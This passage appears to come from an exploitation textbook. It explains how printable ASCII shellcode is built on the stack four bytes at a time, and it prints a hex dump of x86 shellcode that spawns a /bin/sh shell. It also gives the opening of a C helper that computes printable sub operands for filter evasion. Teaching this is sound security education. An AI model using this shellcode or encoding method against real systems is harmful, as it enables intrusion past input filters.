ESP up (toward lower memory addresses) to the end of the newly pushed
value, ready for the next four bytes of shellcode (shown in italic in the pre-
ceding shellcode). More sub instructions are used to wrap EAX around to
0x53e28951, and this value is then pushed to the stack. As this process is
repeated for each four-byte chunk, the shellcode is built from end to start,
toward the executing loader code.
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1......j.XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin..Q..S.|
00000020 e1 cd 80 |...|
Eventually, the beginning of the shellcode is reached, but there are only
three bytes (shown in italic in the preceding shellcode) left after pushing
0x99c931db to the stack. This situation is alleviated by inserting one single-
byte NOP instruction at the beginning of the code, resulting in the value
0x31c03190 being pushed to the stack— 0x90 is machine code for NOP.
Each of these four-byte chunks of the original shellcode is generated
with the printable subtraction method used earlier. The following source
code is a program to help calculate the necessary printable values.
printable_helper.c
#define _GNU_SOURCE   // strfry() is a GNU libc extension
#include <stdio.h>
#include <sys/stat.h>
#include <ctype.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>  // bzero()
// Bytes the loader may use as sub operands: all printable ASCII, with
// characters that commonly get filtered or mangled (quotes, spaces, etc.) left out.
#define CHR "%_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-"
int main(int argc, char* argv[])
{
unsigned int targ, last, t[4], l[4];   // target and starting EAX, split into bytes
unsigned int try, single, carry=0;
int len, a, i, j, k, m, z, flag=0;
char word[3][4];                       // up to three 4-byte printable operands
unsigned char mem[70];                 // shuffled copy of CHR
if(argc < 3) {                         // both the start and end value are required
printf("Usage: %s <EAX starting value> <EAX end value>\n", argv[0]);
exit(1);
}
srand(time(NULL));
bzero(mem, 70);
strcpy((char *)mem, CHR);
len = strlen((char *)mem);
strfry((char *)mem); // Randomize the search order so repeated runs give different operands
last = strtoul(argv[1], NULL, 0);      // EAX value before the sub instructions
targ = strtoul(argv[2], NULL, 0);      // EAX value wanted after them
// The byte-by-byte search for the operands follows here; the rest of the listing is not reproduced on this page.